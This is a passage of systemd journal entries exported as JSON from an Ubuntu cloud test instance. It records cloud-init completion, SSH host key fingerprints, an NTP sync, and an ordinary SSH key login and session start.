"d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : 
"1615280822658219" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=352;b=e2b08827b5804427b422c10c84f1567e;m=2e22d66;t=5bd16dfa5acce;x=924240d1c537a496", "__REALTIME_TIMESTAMP" : "1615280822660302", "__MONOTONIC_TIMESTAMP" : "48377190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660295" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=353;b=e2b08827b5804427b422c10c84f1567e;m=2e22e3f;t=5bd16dfa5ada6;x=98532139d824c042", "__REALTIME_TIMESTAMP" : "1615280822660518", "__MONOTONIC_TIMESTAMP" : "48377407", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----BEGIN SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660512" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=354;b=e2b08827b5804427b422c10c84f1567e;m=2e23704;t=5bd16dfa5b66c;x=9e6e028ffde5bdfd", "__REALTIME_TIMESTAMP" : "1615280822662764", "__MONOTONIC_TIMESTAMP" : "48379652", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "1024 SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1 (DSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822662757" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=355;b=e2b08827b5804427b422c10c84f1567e;m=2e24064;t=5bd16dfa5bfcb;x=5d8b087493a3832b", "__REALTIME_TIMESTAMP" : "1615280822665163", "__MONOTONIC_TIMESTAMP" : "48382052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1 (ECDSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822665156" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=356;b=e2b08827b5804427b422c10c84f1567e;m=2e24852;t=5bd16dfa5c7b9;x=24744f5bd495849b", "__REALTIME_TIMESTAMP" : "1615280822667193", "__MONOTONIC_TIMESTAMP" : "48384082", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1 (ED25519)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822667186" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=357;b=e2b08827b5804427b422c10c84f1567e;m=2e25165;t=5bd16dfa5d0cc;x=19e81bc8f1dd4d4b", "__REALTIME_TIMESTAMP" : "1615280822669516", "__MONOTONIC_TIMESTAMP" : "48386405", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "2048 SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1 (RSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669509" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=358;b=e2b08827b5804427b422c10c84f1567e;m=2e252a5;t=5bd16dfa5d20c;x=5f885475c0d1e4b3", "__REALTIME_TIMESTAMP" : "1615280822669836", "__MONOTONIC_TIMESTAMP" : "48386725", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----END SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669830" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=359;b=e2b08827b5804427b422c10c84f1567e;m=2e25352;t=5bd16dfa5d2ba;x=26ee703de244bf9c", "__REALTIME_TIMESTAMP" : "1615280822670010", "__MONOTONIC_TIMESTAMP" : "48386898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822670004" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35a;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=35f1f96d30effd5a", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:final' at Tue, 09 Mar 2021 09:07:02 +0000. Up 48.19 seconds.", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=final" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35b;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=f45d078408a62683", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules 
--mode=final", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 finished at Tue, 09 Mar 2021 09:07:02 +0000. Datasource DataSourceOpenStackLocal [net,ver=2]. Up 48.44 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35c;b=e2b08827b5804427b422c10c84f1567e;m=2e469e2;t=5bd16dfa7e94a;x=9a8a1f311ad6278b", "__REALTIME_TIMESTAMP" : "1615280822806858", "__MONOTONIC_TIMESTAMP" : "48523746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "Started Execute cloud user/final scripts.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822804000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35d;b=e2b08827b5804427b422c10c84f1567e;m=2e476be;t=5bd16dfa7f626;x=3d51e90cf87306f1", "__REALTIME_TIMESTAMP" : "1615280822810150", "__MONOTONIC_TIMESTAMP" : "48527038", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : 
"init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-init target.", "UNIT" : "cloud-init.target", "INVOCATION_ID" : "12b2c5a5c7674278a29d76d29ab052c1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822807544" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35e;b=e2b08827b5804427b422c10c84f1567e;m=2e4f15a;t=5bd16dfa870c1;x=ef22149adcde0829", "__REALTIME_TIMESTAMP" : "1615280822841537", "__MONOTONIC_TIMESTAMP" : "48558426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3260", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "b07a249cd024414a82dd00cd181378ff", "KERNEL_USEC" : "4655018", "USERSPACE_USEC" : "43903173", "MESSAGE" : "Startup finished in 4.655s (kernel) + 43.903s (userspace) = 48.558s.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822841333" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35f;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=8ce63cc3a6a6ddf3", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", 
"_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:576: gracefully waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=360;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=f865ce5bd4cbe418", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:578: done waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=361;b=e2b08827b5804427b422c10c84f1567e;m=2fcc249;t=5bd16dfc041b0;x=f81c02bb69040e23", "__REALTIME_TIMESTAMP" : "1615280824402352", "__MONOTONIC_TIMESTAMP" : "50119241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon stop requested to wait for socket activation" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=362;b=e2b08827b5804427b422c10c84f1567e;m=4435c5d;t=5bd16e106dbc4;x=891668ccabf0551c", "__REALTIME_TIMESTAMP" : "1615280845806532", "__MONOTONIC_TIMESTAMP" : "71523421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "CODE_LINE" : "678", "CODE_FUNC" : "manager_receive_response", "MESSAGE" : "Synchronized to time server 91.189.89.199:123 (ntp.ubuntu.com).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280845806492" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=363;b=e2b08827b5804427b422c10c84f1567e;m=9efca26;t=5bd16e6b34985;x=409f2dd401169ca7", "__REALTIME_TIMESTAMP" : "1615280940992901", "__MONOTONIC_TIMESTAMP" : "166709798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" 
: "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "MESSAGE" : "Accepted publickey for ubuntu from 10.18.255.254 port 50031 ssh2: RSA SHA256:HORx/u4a1tHXBbnoTOF0nmyK3B5/06UnlHbNMExg8+g", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940992855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=364;b=e2b08827b5804427b422c10c84f1567e;m=9efe4c3;t=5bd16e6b3642a;x=7334fd38c0f161a5", "__REALTIME_TIMESTAMP" : "1615280940999722", "__MONOTONIC_TIMESTAMP" : "166716611", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "MESSAGE" : "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940999697" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=365;b=e2b08827b5804427b422c10c84f1567e;m=9f004cd;t=5bd16e6b38434;x=6c57a109f623e465", "__REALTIME_TIMESTAMP" : "1615280941007924", "__MONOTONIC_TIMESTAMP" : "166724813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" 
: "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice User Slice of ubuntu.", "UNIT" : "user-1000.slice", "INVOCATION_ID" : "6d2df251246544468f4d5b4b70d4730b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941007835" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=366;b=e2b08827b5804427b422c10c84f1567e;m=9f04f2c;t=5bd16e6b3ce93;x=243bdea031327f14", "__REALTIME_TIMESTAMP" : "1615280941026963", "__MONOTONIC_TIMESTAMP" : "166743852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting User Manager for UID 1000...", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941026951" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=367;b=e2b08827b5804427b422c10c84f1567e;m=9f088f5;t=5bd16e6b4085d;x=3242c936452d94ce", "__REALTIME_TIMESTAMP" : "1615280941041757", "__MONOTONIC_TIMESTAMP" : "166758645", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Session 1 of user ubuntu.", "UNIT" : "session-1.scope", "INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941040021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=368;b=e2b08827b5804427b422c10c84f1567e;m=9f0898e;t=5bd16e6b408f6;x=aced2a2b19bceba0", "__REALTIME_TIMESTAMP" : "1615280941041910", 